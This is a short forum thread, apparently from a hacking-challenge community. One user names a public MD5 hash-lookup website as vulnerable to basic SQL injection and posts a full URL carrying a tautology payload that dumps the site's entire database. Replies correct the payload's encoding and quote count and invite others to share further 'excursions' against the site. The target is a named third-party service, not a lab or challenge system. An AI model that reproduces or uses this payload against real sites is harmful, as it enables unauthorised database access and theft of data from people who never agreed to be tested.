hi all, on my quest to try and finish the RHC1 challenge (still can't get that bloody hash) i've discovered a site you could play with that's vulnerable to really basic SQL injection. the link you use to access the hash and find it's original string(s) in the DB (if they have it) is http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072, however you can get the whole DB by entering

Edit: http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072' or ''='

hope you have fun playing around
oh, and also, please feel free to append your "excursions" to this post as i'm always eager to learn.

you mean, by entering this:
http://nz.md5.crysm.net/find?md5=dfb9f69b9030bad95d21f40935d72072'%20or%20''='

shouldn't you be on holiday? i wrote it that way for readability only, besides, the browser fills in the gaps for you.

yea i see, but you only need 1 ' on the end not 2

oh crap, thanks for that. didn't even realize i made that typo...